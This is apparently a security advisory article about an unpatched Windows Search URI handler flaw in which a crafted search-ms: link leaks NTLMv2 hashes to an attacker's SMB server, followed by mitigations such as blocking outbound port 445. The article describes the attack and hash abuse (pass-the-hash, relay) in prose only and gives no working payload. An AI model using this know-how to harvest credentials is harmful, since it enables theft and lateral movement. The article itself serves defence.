Critical Flaw: Windows Search URI Handler Leaks NTLMv2 Hashes Via Single Click

A silent and significant vulnerability has emerged within the Windows operating system, posing a substantial risk to sensitive credential data. A newly discovered flaw in the Windows Search URI handler can surreptitiously transmit NTLMv2 hashes to attacker-controlled servers. This occurs with nothing more than a user clicking a specially crafted link, bypassing traditional security prompts and leaving organizations exposed to credential theft and lateral movement.

This behavior mirrors an earlier identified bug class, CVE-2023-33829, which affected the Snipping Tool. However, for this Windows Search variant, Microsoft has yet to assign a CVE identifier or provide a patch, leaving a critical window of exposure for countless systems globally.

Understanding NTLMv2 Hashes and Their Risk

NTLM (NT LAN Manager) is a suite of Microsoft security protocols that provide authentication, integrity, and confidentiality to users. While NTLMv2 is an improvement over its predecessors, offering enhanced security, an NTLMv2 hash itself is not a user’s password. Instead, it’s a cryptographic representation derived from the password. However, these hashes are highly valuable to attackers.

Attackers can use captured NTLMv2 hashes in several ways:

• Pass-the-Hash (PtH) Attacks: By simply possessing the hash, an attacker can authenticate to other systems on the network without ever needing to crack the actual password. This is a common technique for lateral movement within an enterprise.
• Offline Brute-Forcing: While more computationally intensive than directly using the hash, complex passwords can still be brute-forced offline from their NTLMv2 hash, eventually revealing the plain-text password.
• Relay Attacks: NTLMv2 hashes can be relayed to other services that accept NTLM authentication, allowing attackers to impersonate the compromised user.

The Mechanism of the Windows Search URI Handler Flaw

The core of this vulnerability lies in how Windows handles specific Uniform Resource Identifier (URI) schemes. URIs like search-ms: are designed to launch the Windows Search application with predefined parameters. Attackers can craft a malicious link or embed such a URI within a document (e.g., a Word document, a web page, or an email). When a user clicks this link, Windows attempts to process the URI.

Within this malicious URI, a crafted parameter can direct Windows Search to attempt to load external content or resources from an attacker-controlled SMB (Server Message Block) share. During this connection attempt, the Windows operating system, by default, will automatically try to authenticate to the SMB share using the user’s NTLMv2 hash. Crucially, this happens without any explicit user prompts or warnings, making it an extremely stealthy method of credential harvesting.

This process is highly effective because:

• It leverages a legitimate Windows function.
• It requires minimal user interaction (a single click).
• It bypasses conventional security measures that might block executable downloads or malicious scripts.

Comparison to CVE-2023-33829 (Snipping Tool)

The described flaw is not entirely new in concept. It bears a striking resemblance to CVE-2023-33829, a vulnerability discovered in the Windows Snipping Tool. In that instance, a crafted link could cause the Snipping Tool to make network requests that leaked NTLMv2 hashes. Microsoft addressed CVE-2023-33829 with a security update. However, the current Windows Search URI handler flaw represents a similar attack vector, yet it remains unpatched and without an assigned CVE, indicating a lack of official recognition or a delay in remediation from Microsoft.

Remediation Actions and Mitigation Strategies

Given the absence of an official patch, organizations and users must adopt proactive mitigation strategies to protect against this NTLMv2 hash leakage vulnerability:

• Block Outbound SMB Connections (Port 445): The most effective technical mitigation is to restrict outbound connections on TCP port 445 (SMB) from client machines to the internet. This prevents workstations from initiating SMB communication with external, potentially malicious, servers. Implement this at the perimeter firewall.
• Implement NTLM Block Policy: Group Policy can be used to restrict NTLM authentication, particularly for outbound connections. While this can have compatibility implications with legacy systems, it significantly reduces the attack surface.
• Educate Users on Phishing and Malicious Links: User awareness training remains a cornerstone of cybersecurity. Emphasize the dangers of clicking unknown links, even if they appear benign or come from trusted sources. Attackers often embed these links in phishing emails or malicious websites.
• Monitor NTLM Authentication Attempts: Implement robust logging and monitoring for NTLM authentication events, especially those originating from client machines attempting to connect to external servers or unusual internal destinations. Unusual NTLM traffic should trigger alerts.
• Enforce Least Privilege: Ensure users operate with the principle of least privilege. If an attacker captures a hash, the impact will be limited by the scope of the compromised user’s access.
• Disable URI Schemes (Advanced/Careful Implementation): In highly controlled environments, specific URI schemes that pose a risk could potentially be disabled via registry modifications. However, this requires careful testing as it can impact legitimate functionality.

Relevant Tools for Detection and Mitigation

Tool Name	Purpose	Link
Wireshark	Network protocol analyzer to detect outbound SMB connections and NTLM negotiation.	https://www.wireshark.org/
Group Policy Management Editor	Configure and deploy NTLM policies, firewall rules (e.g., blocking outbound port 445).	(Standard Windows component)
Microsoft Defender for Endpoint / EDR Solutions	Detect suspicious outbound network connections and malicious activity related to URI handler exploitation.	https://www.microsoft.com/en-us/security/business/microsoft-defender-for-endpoint
Firewall (e.g., Palo Alto, Fortinet, pfSense)	Enforce network segmentation and block outbound SMB (port 445) at the perimeter.	(Vendor specific)

Conclusion: Immediate Vigilance Required

The Windows Search URI handler flaw represents a potent threat, leveraging a single click to expose sensitive NTLMv2 hashes. The absence of an official CVE and a patch from Microsoft necessitates immediate and proactive defensive measures. Organizations must prioritize blocking outbound SMB traffic, enhancing user awareness, and implementing robust monitoring for NTLM authentication to safeguard against credential theft and the subsequent risks of lateral movement and broader system compromise. Remaining vigilant and implementing the recommended mitigations is paramount in protecting enterprise environments from this silent, yet critical, vulnerability.